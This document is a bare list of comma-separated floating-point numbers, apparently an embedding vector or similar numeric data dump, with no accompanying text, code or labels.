0.012330998,-0.016490646,0.020829294,0.0048945737,-0.0021827582,-0.0012145583,0.007396506,-0.018794676,0.012767104,-0.013107019,0.005983963,0.000008136501,0.021593321,0.036221538,-0.008648037,0.023508921,0.013830336,-0.021721367,0.02898335,-0.008947014,-0.011395066,-0.017144255,0.0035937063,0.017123455,0.0065582884,-0.01806568,-0.02884761,-0.018298067,-0.006575101,-0.0039079073,0.0028358407,-0.0026108585,-0.028925776,-0.032569505,-0.018831307,0.019152682,-0.016291147,0.0002824332,0.0114669455,0.025078833,0.011365628,0.010557053,0.0069079758,0.0050297403,0.0070589404,-0.018540384,0.0040171407,-0.012601732,0.006832192,0.021682635,-0.009591579,0.010990602,0.0048075244,0.034373034,0.00468453,-0.010783586,-0.012221785,-0.016525295,0.017762564,-0.018291825,-0.0035161045,-0.015329077,-0.012582255,-0.017758483,-0.008317721,0.099664934,-0.012539512,0.007855291,-0.019266164,0.0011587458,-0.000412741,-0.019001586,-0.00536181,-0.011208705,-0.012037716,-0.0020384213,0.016702516,-0.014162793,0.01870992,-0.0066764615,0.004364807,0.0035433858,-0.0028301745,-0.05105226,0.020888563,0.007727575,0.0010220478,0.010827544,-0.021188058,0.0054320013,0.011828589,-0.041176826,-0.011930944,-0.025235701,-0.0066473233,0.0046603065,0.0033437994,-0.011657899,-0.0011234158,0.024700886,-0.016046071,-0.024972975,0.017731542,-0.017369622,0.01463397,-0.016583184,0.0053426935,0.00083767343,-0.011702862,0.009054846,0.03710804,0.024660185,-0.023428665,0.0018346483,0.024019677,0.027631547,-0.014300955,0.0066949194,-0.000011209283,-0.00856803,-0.0028838564,0.022703063,-0.0061901067,0.0010728744,-0.0013027439,0.011036888,0.003496484,0.017759375,0.009599189,0.016172087,-0.0028335182,0.010106273,0.037665017,0.006036586,0.020386625,-0.03709585,-0.03292369,-0.01959201,-0.022646887,-0.014231106,-0.003906988,-0.0040445905,-0.008297051,0.0037173827,0.012142626,0.011098353,-0.0017508595,0.0075996933,-0.0033102522,-0.0045375,-0.000384357,-0.032904625,-0.006439001,0.0009127543,-0.001498299,0.011881222,0.0368444,-0.00012047819,0.012654537,-0.006379348,0.024820445,0.005389672,-0.009014138,-0.0042557484,-0.010422859,-0.004106557,0.010103399,-0.028020453,-0.010085699,0.005182628,0.023966504,-0.004648659,-0.000177889,0.003990827,-0.0048019327,0.024136491,0.0027531409,0.021121684,-0.03777909,-0.022499386,-0.015370148,-0.025650224,0.013983795,-0.00011971561,-0.007900947,-0.00093646033,-0.021958789,0.0015228897,-0.0005619963,-0.016644754,-0.00080865726,-0.043356836,-0.009772364,0.009234462,0.012957739,-0.016248051,0.016943911,-0.007933203,-0.011750578,0.013728675,0.030234804,0.01755162,-0.00445537,0.02147019,-0.0051394203,0.023985317,0.01657874,0.019060139,-0.012135959,-0.0033648203,-0.0166237,0.0081259515,-0.0017573695,-0.014882768,-0.002880841,0.0001540113,0.015996762,-0.01288282,0.038219802,-0.009133838,0.017509542,0.0014649591,-0.030741228,-0.0068351044,-0.010899322,-0.0204904,0.015281143,-0.020316435,0.03124474,-0.00012115631,0.009337294,0.0029020405,0.08850294,-0.016434152,0.0064441133,-0.0017250683,-0.02771559,-0.0076402286,0.019615568,0.011578317,0.0019992257,-0.0015589312,-0.020873958,-0.02117381,0.00017738277,-0.0032812716,-0.015593001,0.01422289,-0.022369752,-0.004367146,-0.023358604,0.004543754,0.03527463,-0.01863783,0.016928807,0.028574388,0.009272861,0.024261005,0.026629006,-0.016203772,-0.006763913,-0.020548742,-0.0037888044,-0.0054009384,-0.004257081,0.0031386523,-0.052888487,0.015771668,0.015784765,0.00925619,-0.020944744,-0.019242417,0.0030791515,0.009785582,-0.006228258,-0.022594143,-0.007069348,0.039603334,-0.0032994684,0.012938098,-0.017975656,0.01718721,0.008331927,0.016412018,-0.021486882,0.0035927068,0.0029288991,0.019234607,0.004723358,-0.041560907,0.04515199,0.006709581,0.006073469,0.020028247,-0.0012093884,0.004473777,-0.0029019522,0.007659144,-0.029632466,-0.015408058,-0.00701071,0.0025874656,-0.004036668,0.0020105303,-0.012614289,0.014720499,-0.01824668,0.010207016,-0.0044135195,0.00024608654,0.0021585694,0.012633205,-0.0050633303,0.006197186,0.019418282,-0.0008943637,0.0029516087,0.015470029,0.004973976,0.0050759087,0.0067486176,-0.000051333736,-0.013092933,0.018190114,-0.0030922587,0.0064888,0.026198676,0.03278171,0.018500973,0.015401604,-0.0019421404,0.007372068,0.010213371,-0.008708541,0.012972723,-0.0050687566,-0.009771297,0.007827378,0.011580016,-0.003893018,0.0024625694,0.029269183,-0.025108393,-0.0019971416,0.0084635755,-0.009282892,0.024250204,-0.02832424,-0.015805872,-0.007404452,-0.013841562,-0.011324148,0.018708602,0.0077943085,0.0150391245,0.020195467,0.010445012,0.011013019,-0.010879802,-0.01957356,-0.010324281,0.019078339,-0.012824996,0.026658464,0.02220027,-0.03889651,0.009818274,0.0005401311,-0.024226546,-0.028828656,0.041978814,-0.0025919331,0.02076711,0.022307744,0.05246138,0.0058513875,0.012837837,0.011409705,0.019401528,0.0017613405,-0.03270394,-0.0031590557,0.0030219068,0.0016319763,-0.012268676,-0.007460483,-0.007868215,0.00004620861,0.037643522,-0.027973374,0.0010037745,0.0044543277,0.028012153,-0.028833715,0.012338315,-0.007229873,-0.021708345,0.032458436,-0.0035293247,0.06884395,-0.030563403,-0.030616345,-0.0013314995,0.027000304,0.008348753,0.00014718581,0.014188309,-0.029744616,0.01596356,-0.00054401805,0.017038003,0.008704832,0.023654312,-0.009015426,-0.010384779,0.0044509773,0.0005008961,-0.007046596,0.010143136,-0.014879058,-0.007904992,0.0039046186,-0.016951034,-0.0020758202,0.015242208,0.02656896,0.00840282,0.007904976,-0.020968115,-0.032126337,0.001738913,0.0031116542,-0.011952501,0.0012614715,0.0025242895,0.0074674855,0.008988285,-0.018100446,0.036664203,-0.017271234,0.005447138,-0.0026119095,0.025636442,0.034158368,0.004115928,0.012669224,0.009567187,0.012940192,0.0060443426,0.008386733,0.038974397,0.016695315,-0.00012362999,-0.014014975,0.012705509,0.027970603,0.009659134,-0.012358909,0.00961645,-0.0073949867,-0.02151354,-0.012277819,-0.010919989,-0.023107877,-0.007759966,0.008619071,-0.024359971,-0.006579664,-0.018687291,0.0001593169,0.0069128033,-0.009590522,0.0029756553,0.014377629,0.011227076,-0.012686177,0.022369396,0.014944338,-0.012019783,-0.010965042,0.0042564934,0.002048349,-0.004265844,0.01380911,0.00084061944,0.0068677473,0.0031637608,0.0048483447,0.00054766866,0.011311579,-0.013301655,0.02133126,0.009341917,0.0035302592,0.001479104,0.019946335,-0.035113953,0.0070944712,0.012825087,-0.021326674,0.009837358,-0.021248072,0.053227037,-0.012895885,0.0035734577,0.005256577,0.0046520433,0.0010432712,-0.02370704,0.015052727,-0.043073222,-0.0021515612,0.0105580855,-0.001015177,-0.014862101,0.035832636,0.028165525,0.003876178,0.009187266,0.016311709,-0.00892141,-0.000742992,-0.0066347765,0.016470972,-0.0060268403,-0.0032146783,-0.045846425,-0.013179928,-0.021324547,-0.024852907,-0.024307964,0.044384956,0.008412459,0.009697338,0.000505269,0.013475761,-0.01085764,-0.015290304,-0.0052191736,-0.02819027,0.004732843,0.007610479,-0.029406833,0.022539183,0.028237415,0.0056060874,-0.005382884,-0.021818455,-0.00040838096,0.0078054843,0.00800484,-0.029236132,-0.0044162404,0.009851891,-0.025335053,0.021394653,-0.018908227,0.022102403,0.0107487645,0.041783873,0.019941889,0.0036203044,-0.006470289,0.003627219,-0.012306949,0.015829187,0.0011788309,0.01961091,0.009612375,0.012556965,0.01244131,0.0016129954,-0.006635785,-0.009653552,-0.0066022365,0.025015803,0.023550972,0.009911215,0.0018166788,-0.014791953,0.0074841315,0.02489697,0.015239418,-0.0026647467,0.010405815,0.010837093,-0.00203927,0.030377548,-0.007080431,0.007895313,-0.018497169,-0.0029492993,-0.0246329,0.03239174,0.0305424,-0.014606883,0.00773906,0.0079606855,-0.005471262,-0.0004848659,-0.016770015,-0.016014252,-0.007386157,-0.030137032,0.0014911618,-0.018635022,-0.0052111284,-0.03747001,-0.0075905616,0.009071642,0.01328319,-0.0044478923,0.007350741,-0.016980806,-0.011648344,-0.016197674,-0.044245183,-0.019284146,0.0061386707,0.0367721,-0.041075666,-0.0020839467,0.012502016,-0.005296404,0.0060739326,0.026048442,-0.020472642,-0.013018352,-0.0038218177,-0.007704115,0.028603721,0.00543099,0.025901709,0.0139377145,-0.010859285,-0.018127004,-0.012496897,-0.009317171,-0.017934557,-0.0028477309,0.010617219,-0.005039126,0.0019046377,-0.016357524,-0.019139929,-0.017817484,0.0014607369,-0.022992747,-0.02293924,0.003014816,0.020297827,-0.008792901,0.02431246,-0.025936082,0.02175672,0.033154238,-0.010664296,0.0040509067,-0.006766185,0.008893495,0.020629313,0.024692414,-0.018425893,-0.03223056,-0.017104823,-0.014051585,-0.0073684654,0.0021083078,-0.01304741,-0.007861728,-0.0146343475,-0.02398949,0.0014352304,-0.036451273,-0.00052071764,0.00595399,-0.02580535,0.027624188,-0.021661459,0.012359444,0.010640663,0.014138951,0.016250758,0.0008108306,0.019375393,-0.021011682,-0.010127052,0.018151952,-0.008664469,-0.0016497524,0.008130346,-0.024153506,-0.023489991,-0.038601223,-0.00071631355,-0.018104684,0.02303884,0.023756165,-0.010418463,-0.033999957,-0.0106461365,-0.0100952145,0.005872827,-0.028501377,-0.0087511595,-0.013509011,0.0030797762,0.0013062304,0.012831505,-0.03843039,0.017417787,-0.0048533026,-0.024521906,0.023618126,0.008529622,0.01637429,-0.0019335396,0.016141811,-0.0065624695,-0.032769185,0.020009177,-0.016301917,0.0066512683,0.03353992,0.0042457655,0.011328175,-0.004865944,-0.01653558,-0.018694034,-0.00034904404,0.010661648,-0.013352586,0.01657654,0.0027820226,0.0024954053,0.0029891273,-0.010800006,0.033070628,0.00015020296,0.0019880494,0.01818639,0.0058127847,-0.032256246,-0.0017874117,0.01548366,-0.010280915,0.004769899,-0.004512419,0.0017833406,0.017267125,0.03417136,-0.011333197,-0.018436875,0.01586347,-0.02270795,0.014342637,0.01612418,-0.012971565,-0.007122135,-0.02807836,0.015931211,-0.033004854,-0.014808314,-0.0035032788,0.009318616,0.002263524,-0.02296811,0.004593466,-0.0009967037,0.009228732,0.017066384,-0.020874843,-0.0036465966,-0.0061698877,0.012785863,-0.0027533812,-0.00337606,0.015720423,-0.02065047,-0.01148136,-0.003082572,-0.0146987885,0.0030326655,0.027221026,0.0013745737,-0.010342967,0.006628928,-0.0024167409,-0.011155355,-0.0015693197,-0.024518583,0.031723008,0.00578186,-0.015174797,0.016725916,-0.03407557,-0.011528474,0.013185594,-0.00039128217,-0.0032364374,0.0035807681,0.02395034,0.020758634,-0.0095884055,-0.016688284,-0.025700605,-0.056027442,0.028895184,-0.030708602,-0.019967213,0.011152624,0.0026596845,0.01592306,0.012431742,0.049880337,-0.0029003771,0.0036465926,0.0061280257,0.004624686,0.012715982,-0.004328243,-0.0038599474,-0.02939411,0.006942467,0.036706038,0.008855846,0.011377897,-0.01110514,0.012196843,-0.012877528,0.039466526,0.009398822,-0.021092733,-0.0051076137,-0.026135776,-0.011271574,-0.0029158308,0.0139979655,0.001592169,-0.015344643,-0.02596507,-0.0115905395,0.0064464193,0.020525899,-0.007110438,0.0058902986,-0.00077432673,-0.0029556837,-0.0027651049,0.024998529,-0.0062348926,-0.028895745,0.0034893923,-0.004606085,0.0013983975,-0.008242114,0.01891085,-0.00023922023,-0.007062772,0.00484923,-0.0076890728,0.020808257,0.0020683124,-0.0019313253,0.026692599,0.013293066,0.0044826786,-0.0025364042,0.008695426,0.016543541,-0.02988892,-0.0060281353,0.007815741,0.036653634,-0.020736797,-0.01583424,-0.010529488,-0.0141638955,-0.020185681,-0.012685912,-0.03143439,0.021345202,-0.006886118,-0.010556204,-0.0033004319,-0.018355522,-0.01323148,0.0017951112,-0.008210708,-0.0028813833,-0.03964596,-0.009829396,-0.0016628867,0.0019507934,-0.011933478,-0.008070925,-0.011712089,-0.00058736664,0.0074169193,-0.015175478,0.00980825,0.0048966636,0.003406889,0.00905596,0.012230589,-0.0046570534,0.028429259,-0.010867788,-0.0019592126,0.04746219,0.013606678,0.00077991385,0.024758028,0.012343718,0.031654578,0.029705029,-0.021182394,-0.014633484,0.00013792141,0.028501878,0.018937811,-0.0046336446,-0.025481956,0.01704897,0.024504175,0.029519012,0.0063047456,0.0007993158,0.017237404,-0.0012816996,0.02072952,-0.0075201388,0.01904045,-0.010484396,-0.013139734,0.009679893,-0.0017620785,0.017811451,0.0036655175,-0.01630145,0.015723743,0.0066709057,0.0083311545,-0.02508847,-0.014426837,0.0070198583,-0.016541954,0.0028254988,0.006116146,-0.004388395,0.004978254,-0.01339766,-0.0039821765,0.0071104732,-0.0066594426,0.002224194,0.00272033,0.016927302,0.0026075453,0.016380228,-0.0010529922,-0.0124656875,0.014217368,-0.013359139,0.012223907,0.021071842,0.0066187726,-0.026468206,-0.00507929,0.009240795,-0.032265965,0.014704438,0.00046995896,0.004734447,-0.0068149623,-0.0035015347,0.0047114547,0.02046148,-0.0052256286,0.036734175,0.007906795,-0.016226966,0.025252547,0.009317139,0.015040633,0.008439305,0.00579975,0.044755608,0.031699456,0.0062034708,0.0014367935,-0.0037584146,0.0011152781,-0.015877394,-0.020927496,-0.010302419,-0.018535843,0.0027683524,0.016954971,0.0012105547,-0.0067847935,0.050330285,-0.014587902,0.01632296,-0.0034258154,-0.003938333,0.0011674196,0.016790647,0.003405438,0.031729255,-0.024651665,0.025965622,0.011997735,-0.044658575,0.0052538463,-0.013990351,-0.007572058,-0.002058175,0.003506681,-0.008211581,-0.0005657247,0.0029150771,-0.0160167,0.011499258,0.025024742,-0.013694027,-0.0025449337,0.039073586,0.0108494405,0.0005059672,0.007674413,-0.021711547,0.016980197,0.009524045,-0.0060097543,-0.016934391,0.02784773,-0.0064056497,0.021831144,0.027879959,-0.024960026,0.005793732,0.0010381507,-0.000018215087,-0.017060354,-0.012761737,0.009168287,0.023120169,0.021339588,-0.025219275,-0.004767805,0.041853283,-0.0114318365,0.006655009,-0.00032436842,0.03282781,-0.0041580643,0.01852874,0.003884591,0.016735397,-0.01160358,0.014902755,-0.024571905,-0.00959941,-0.00020883289,-0.011213471,-0.018354852,0.003189378,-0.020069895,-0.011898377,-0.000047708087,-0.0027417722,-0.021034809,0.03328045,0.035825945,0.010045137,0.0010265002,0.0012615377,0.0027541225,0.016880877,-0.0023147925,0.0044609555,-0.026183225,-0.014780758,0.011608744,0.011481825,-0.0046169865,0.00003201155,-0.008729488,-0.035398003,0.009059253,0.009215246,0.020631004,-0.016861696,0.0020705608,-0.0022964305,-0.012543562,-0.027913302,0.00435871,0.0029975877,0.0019999652,-0.013663889,-0.0045292396,-0.01292938,0.0028517924,-0.0057737017,0.08122459,-0.015771434,0.013163044,0.00007752621,0.019869635,-0.014584881,0.008044256,0.009348118,0.0033421358,-0.010305157,-0.021885103,-0.025101705,-0.007942947,-0.006793711,0.02135265,-0.0117374025,-0.0071820845,0.007699465,-0.018879637,0.04033169,-0.0007897678,0.0052874163,0.00072392006,0.014760179,-0.008204737,0.018251058,0.014038845,-0.03962745,0.020022396,-0.017703677,0.0016837027,-0.0041486784,0.0023549849,0.012019415,0.008210761,-0.0021314814,0.01177554,-0.010948014,-0.026510518,0.013286988,-0.004468828,-0.008684687,0.019368848,0.01792357,0.009326888,-0.009457529,-0.008481559,-0.008437436,-0.003678463,-0.016534505,0.013047004,0.0014528283,-0.014916822,0.013197398,-0.022025952,0.03439212,0.002231598,0.013735455,0.025248293,-0.011535728,0.0063976883,0.01996657,-0.005895885,-0.022380091,-0.004523729,-0.0036982694,-0.012752324,-0.02439318,0.019076718,-0.03366881,0.011787671,-0.008950107,0.019206043,0.019608589,0.0014887798,0.0016093071,0.01689794,-0.018930484,-0.022532014,-0.02554063,-0.009148128,-0.00062138913,0.018592924,0.011279807,-0.0029047774,0.014531697,-0.0033484884,0.004660363,0.08417856,0.01629184,0.006497609,-0.006163078,-0.0008901635,0.016872646,0.023345357,0.020964963,-0.0058173235,0.004107793,-0.03179101,0.03549484,0.009923641,0.0026091489,0.011296669,-0.022167167,0.01032857,-0.011006323,-0.0030921744,-0.010513828,0.004633429,0.03729016,0.009498914,-0.0073999837,-0.0011445467,0.02101551,-0.012495413,-0.0032459311,0.006968537,-0.014929327,-0.0033353746,0.023643253,0.009629482,-0.0026280456,-0.022940353,-0.030123247,0.0034563148,0.1266311,-0.0017696414,-0.006727946,0.019892648,0.0047499584,0.0126502905,-0.11148553,-0.010617218,0.004826883,0.00075263804,-0.023756111,-0.019831404,-0.0043602292,0.017551305,-0.0053492007,-0.018098367,-0.013086161,-0.0051337793,0.028139053,-0.015064342,-0.01808196,0.010873823,0.014103047,-0.0008646036,-0.029558767,-0.013832544,-0.0011983598,-0.0053499048,-0.01724057,-0.02435259,0.01020246,-0.0085102515,0.0063436655,-0.018813891,-0.033590604,0.009502433,0.021673618,-0.0060247453,-0.012063965,-0.009232411,0.017943993,-0.008883548,-0.027496586,-0.043480653,-0.12999137,0.01630611,0.0148671605,-0.038414594,0.00007700286,-0.007960013,-0.00463062,-0.003931837,0.028888604,0.021452056,-0.011301813,0.024905281,-0.006708441,0.0051175198,-0.021035664,-0.015000443,0.0062461244,0.003316561,-0.0034634199,-0.009375556,0.018177982,-0.005700664,-0.035602823,-0.0107246395,-0.028753918,0.0036603538,-0.0010142109,0.0427746,0.0011222193,-0.00080654694,-0.011169967,0.004469265,-0.019868478,0.00242777,-0.0016546445,-0.03495371,-0.023468632,0.0010813609,-0.026276806,0.016130207,-0.005821629,0.0013771622,-0.008905274,-0.0001133801,0.009769012,0.02395381,0.014756331,0.0072303344,0.024678132,-0.0041733687,0.037331067,0.010608707,-0.018814785,0.0029992461,0.004177974,0.011414736,0.0069039986,-0.031524055,-0.009028567,0.009049777,-0.004278276,-0.0069368384,-0.023136992,-0.007917712,0.022494128,-0.00054016145,0.013277047,-0.018638095,-0.0010491705,0.021509241,-0.0046003847,-0.0004289276,-0.00383693,-0.022672273,0.023965307,0.016612375,0.00942781,-0.0029466217,0.0073504453,-0.006440149,0.016374268,-0.02436136,-0.006506393,-0.035999455,0.009783757,-0.0065866006,-0.0056183077,-0.0003601955,-0.0082863765,0.0035110852,0.017302005,-0.003639821,0.007112092,-0.0062427167,0.0061372477,0.017176535,0.047821287,-0.009491643,-0.025626907,-0.02084055,0.002432827,-0.017535375,-0.015888218,0.0005942254,-0.030833239,0.01263093,0.014054733,-0.003263946,-0.012612476,-0.005251558,-0.00074389565,-0.014136635,0.023661349,-0.006020843,-0.023650313,-0.0023447867,0.013695506,-0.010031687,0.031429153,0.003631661,-0.032889534,-0.0042202324,0.013380184,0.020771703,0.038746156,0.021537254,-0.035651106,-0.014329456,0.0045776013,0.015399357,-0.0378353,0.011235627,-0.0037528593,0.0048725735,-0.025197167,-0.002098319,-0.010800713,0.025014179,-0.03077655,-0.008655651,0.0006719515,-0.0002659423,0.011634941,0.0038104316,-0.005498631,-0.0248274,0.04060638,-0.0076720687,0.029254993,-0.004630065,-0.003925536,0.021396311,-0.0294385,-0.017648356,0.006770463,0.06702602,-0.01611323,-0.010463761,0.021019608,-0.0054097106,0.0044481107,0.028783489,-0.011000502,-0.017735237,0.00056766334,-0.022739269,-0.0071760393,0.00022476855,0.022087576,-0.012634443,0.011527568,0.010630768,0.021802828,-0.008252485,0.0033455426,0.007371029,-0.0005000768,0.00186241,0.023682287,-0.0014821636,0.011238105,0.021378016,0.013872715,-0.0015801726,-0.0017297821,-0.008812513,-0.02231041,-0.015814286,-0.0016032824,0.007940449,-0.03395916,-0.02062191,0.000091592476,0.00044388865,-0.012093537,0.01188204,0.020546965,0.019603776,-0.024525866,-0.0032874881,-0.021922288,-0.005499632,-0.0063367058,-0.003582571,-0.009734293,0.0009827237,0.012449803,-0.001178232,-0.017510058,0.007879683,0.015437834,-0.009209054,-0.0035525556,-0.005135407,-0.005926175,0.031818386,-0.008979131,-0.041135818,-0.0050306376,0.012580797,0.005425913,-0.011033128,0.0017730489,0.003329258,0.015480489,-0.002596956,-0.018650053,-0.02459838,-0.012080785,-0.008064913,-0.011421002,-0.010274778,0.006987297,0.015071806,0.023656052,0.01472474,0.021940324,-0.00091427285,-0.008630339,-0.0016968768,-0.040936466,-0.020468367,0.035328414,-0.011499932,-0.020014338,0.0042632204,0.010529347,-0.008764625,-0.004463253,0.013077878,-0.0015906235,0.023040503,0.0060448144,0.021929199,-0.017740173,0.009592313,0.012912481,-0.0057042907,-0.014115677,-0.0072383275,-0.0029932586,-0.009580066,0.016518448,0.014794244,-0.012740887,-0.004113245,-0.021596268,0.004849578,-0.023527931,-0.013762479,0.0379239,0.0044776346,0.023040136,0.03946577,-0.014162583,-0.017911807,0.016629899,0.02032494,-0.014402681,0.0120098395,-0.01747897,0.012205454,0.0024960332,-0.024013728,0.017926576,-0.0073381835,0.010683957,0.00019868815,-0.008528015,-0.0020322974,-0.0051907427,0.024943007,0.02349792,-0.005620289,0.0032316404,-0.028518656,-0.023505278,-0.013948825,0.006184248,-0.01075852,0.012276917,0.023734808,0.0050092107,-0.023528576,0.0021351795,-0.03444687,0.019667495,0.0020452554,0.0053112013,0.01199076,0.012497505,-0.020952968,-0.018328516,-0.022805177,-0.0046256743,0.0098651005,0.031755213,-0.0014385959,-0.008031093,-0.020800976,0.021216884,0.04009423,0.0018716545,0.013864137,0.0011442574,0.0019635912,-0.033197403,0.013869976,0.0028890455,0.0028288134,-0.014327599,0.015890038,0.006694728,-0.013297581,-0.0013088976,0.013162673,0.021268496,-0.009068776,-0.006853631,0.017982822,-0.0016003227,0.020629799,0.030193642,-0.008326957,0.00995415,-0.004347548,-0.0026612463,-0.008840923,0.012433738,-0.041863054,-0.015984012,0.019247055,-0.021829702,0.003158383,0.009160189,0.015965361,0.0026512097,-0.027935036,-0.02800416,-0.0046703457,-0.0059301183,-0.015318095,-0.0279724,-0.0031669212,-0.011189627,-0.013379018,0.00012387485,-0.008643763,0.026786353,0.0010827712,-0.01263292,0.017899122,0.019827776,-0.0044791456,-0.027392203,0.014766551,0.003610643,-0.001170144,0.01620574,0.0014883172,0.020169482,-0.022635752,0.05772521,-0.024797736,-0.00025593714,0.0011716996,0.025105977,0.026292605,-0.023180401,-0.014623758,-0.01520344,-0.0124417385,-0.0027942266,-0.05388817,0.007519799,0.0040188953,-0.031299967,-0.010812283,0.026047679,0.0037993013,0.013421974,0.006827433,0.010201741,-0.012018967,0.03096961,0.011929191,-0.025233503,-0.047185726,0.0048979786,0.013653558,-0.03114181,0.005418355,0.021056114,0.008616344,-0.017111117,0.009678915,-0.024907779,-0.0054378966,-0.00054202933,0.00007864535,0.0113159,0.010513111,0.030357614,-0.0027973475,-0.0062257624,0.005574617,-0.006573166,-0.012381859,-0.012367308,0.00934265,-0.01252448,0.010483518,-0.028502883,0.008405124,0.015783366,0.029775804,-0.025472116,0.015051461,0.015688157,-0.007252743,-0.018418478,0.0061144154,0.020183899,0.002654757,-0.026203355,-0.004907047,-0.00028824055,-0.0013734736,-0.019005472,-0.0039696586,-0.00963587,-0.0019169333,-0.012507895,-0.00028438718,-0.0020191974,0.0050653983,-0.00023638854,-0.013084694,0.027080625,-0.018674945,-0.014967924,0.02349168,-0.011636391,0.0060571386,0.00017035093,-0.017158302,0.011807927,0.007950469,0.00756025,0.009508696,-0.004133861,0.013809186,0.04186133,0.017930713,0.012159571,0.0003296688,-0.015662113,0.006320424,-0.009742119,-0.043647494,-0.0052667214,-0.008273528,-0.02227966,-0.009811783,-0.017699484,0.0034451047,-0.014973087,-0.005220795,-0.09906885,0.007755488,-0.008957381,-0.028337311,-0.0076346747,-0.017080043,0.015858807,0.010663762,0.006405695,-0.048759602,-0.004312388,0.021249635,0.0017955505,-0.00833522,0.0030647682,-0.008447234,-0.026204295,-0.0036987502,0.003981683,0.014258197,0.0054395115,-0.024455374,-0.0015467455,-0.013555146,0.01526638,0.005362124,0.015708929,0.007436571,0.0038227874,0.013940392,-0.020012317,-0.011255932,0.012470921,0.0071731983,0.011659749,0.0015620248,0.0067100762,0.012832269,-0.0013077625,0.012058648,-0.0028272446,0.003890058,-0.0063322936,0.01758367,0.008634627,0.0016479056,0.010137583,0.03771981,0.028554298,0.025618056,-0.0027954164,0.0038939328,0.004627353,-0.0050127297,-0.010846316,-0.031566747,0.008830121,0.007519621,0.0150391,0.010513722,-0.024012689,0.0052913693,0.0011049192,-0.011150642,0.0117697995,0.0140731195,-0.0052957768,-0.010344013,-0.030471465,-0.0008850643,0.012853274,0.025701122,0.0022100324,-0.0017856403,0.009745847,0.006676405,-0.02458898,0.003575019,-0.021736402,0.0279898,-0.037501674,-0.014363782,0.0054289754,0.020596605,-0.007725885,-0.030563377,0.0074669793,0.010358777,-0.023140624,0.02068368,-0.012651112,0.008426888,0.0014337804,-0.010085301,-0.009153211,0.029986514,-0.024342217,0.014524673,-0.007099407,-0.0022853394,0.004629868,0.008685678,-0.011206646,-0.019922012,-0.1350803,-0.010981102,0.026752762,-0.019490281,-0.00471545,-0.015884034,0.014000781,0.008534316,0.025016315,0.020700013,-0.008688313,0.021571556,-0.014978669,0.0023144358,0.007028021,0.011047846,-0.030597394,0.0013992203,-0.009616629,-0.011183328,0.009274205,-0.01822747,0.0029633467,0.0065348484,0.00059138477,0.010628529,0.001970737,0.025365995,0.027149882,-0.014777298,-0.002772013,0.021596387,0.0004171423,0.009889874,-0.044444095,0.009129775,0.01628227,-0.018475244,0.0039102,0.029075665,-0.0020393028,0.0072471574,0.010661269,0.014087385,0.0044670133,-0.009321362,-0.012736006,0.026566198,-0.010415903,-0.025922129,0.012557374,0.0011306811,-0.005895452,0.0003126887,-0.0009965071,-0.015156627,0.00626405,0.011670762,0.0075809164,0.008548283,0.008067799,0.004964457,-0.01579851,0.014740664,-0.014627079,0.00045314236,-0.003921627,0.0062944554,0.0048665614,0.006535352,-0.0056339577,0.025980987,-0.00033468162,-0.015463583,0.03158878,0.009635593,0.01581712,0.01964559,0.019400934,0.014150036,0.005696627,-0.032278787,0.019941946,0.01850228,-0.020520365,0.0052436125,0.0028936202,0.008376446,-0.013355626,0.012424936,0.018993836,0.013681076,-0.009389378,0.032429006,0.0044028014,0.017472038,0.042124867,0.0027769785,-0.026614953,-0.001177201,-0.01264278,0.0066327364,-0.014509175,0.006155751,-0.021283494,0.02031029,0.039404504,0.00066725287,0.018495783,-0.0054582055,0.008506445,0.02341092,-0.022641446,0.0014896343,0.0019626925,0.004984981,-0.010972748,-0.0111568365,-0.0027765506,-0.0030257562,0.014323049,-0.007553838,0.00094188825,-0.031134078,0.016231854,-0.035470627,-0.019859573,0.020555906,0.0024254865,-0.031717587,-0.0020116544,0.0071585723,0.01939271,-0.010543147,0.010746859,0.009006947,-0.017880568,0.0024060926,0.010989269,0.005527199,0.015775232,-0.0054098014,-0.012286879,-0.005290876,0.008652509,0.0032124072,-0.01618524,-0.011646992,-0.014264224,0.017041735,-0.004347879,-0.02161024,0.026772711,0.039076198,0.0007790346,0.004493025,-0.008202828,0.00015647597,0.010000206,0.008916728,0.005554584,0.033498857,0.01659685,-0.000107039996,0.010516477,-0.01914762,-0.004957635,0.014177258,0.008327958,0.005588196,-0.0031560746,0.0072554853,0.022170449,-0.065428816,0.02539538,0.013561927,0.0066962293,-0.000024779038,0.040927842,0.018407557,-0.02662491,0.00041432207,-0.026406625,-0.02284882,0.007689018,0.021872258,-0.007853659,-0.005213684,-0.016999852,-0.010911779,0.037852544,0.011892984,-0.012981739,-0.018662218,0.012430246,0.0037174134,0.0011470354,0.027900308,0.021796362,-0.0070811897,-0.021854607,0.0114254095,0.0024025007,-0.017517103,0.00074260525,-0.007979017,0.00041013057,0.028458023,0.0149013065,-0.0061618006,-0.009652421,-0.0020628066,-0.019823385,-0.002213701,0.010526642,-0.0019354428,-0.0151978005,-0.031899054,0.019671934,0.010620709,-0.015554916,-0.02577395,0.006485383,0.0064855744,-0.0062090256,0.01844938,0.017070696,0.006909384,-0.026659612,-0.0091394475,-0.0014512775,0.011260178,-0.035678115,-0.00658709,0.0038702718,-0.0028686405,0.004486592,0.021657268,0.006906697,0.0058697816,0.026314491,0.019534746,0.029809993,0.019944629,0.023564562,-0.01986972,-0.0005255305,-0.0039975084,0.03158684,0.040602606,-0.011365524,-0.0038728067,-0.006518391,0.008039519,-0.013099189,0.00892101,-0.00032203915,0.014257387,0.006467976,0.01170627,-0.01915489,-0.008428758,-0.017011786,-0.015547393,0.014913651,-0.009557938,0.0017302292,-0.034815338,0.008471148,0.0017173949,0.032043096,0.014158276,-0.00041353356,0.018901654,-0.013763888,-0.0076051387,0.0040502045,-0.010612255,0.008788842,-0.0008845389,-0.0071479343,-0.012777022,0.0026375682,0.014539642,-0.0063902275,0.017395992,0.00038526778,0.009888476,-0.022251759,-0.014738843,-0.008860842,-0.003116426,-0.0015984497,0.0041140546,-0.01145107,0.019349203,-0.0051624603,0.002083421,0.007052616,0.012077697,0.011709513,-0.002010666,-0.022789089,-0.02184073,-0.0022224707,-0.010176027,-0.0017549851,0.014221713,-0.0000202496,-0.01641991,-0.012509331,0.0024074055,-0.0050070263,0.005526248,-0.0046077855,-0.0005148944,0.0071367496,0.004301765,-0.058097847,-0.025746278,-0.0164275,0.0010414863,0.022222541,-0.008177261,0.0025495964,0.011388042,0.014562912,0.025126169,-0.022389023,-0.02171078,0.01959743,-0.023607142,-0.010268979,-0.009448311,0.016622545,0.0034877143,0.006784517,0.030365529,-0.008693947,0.015424369,0.0029915078,0.020370899,-0.0158669,-0.012651052,0.00821298,0.017683651,-0.0005658453,-0.014294694,-0.005380385,0.007199419,-0.010299233,0.00053244183,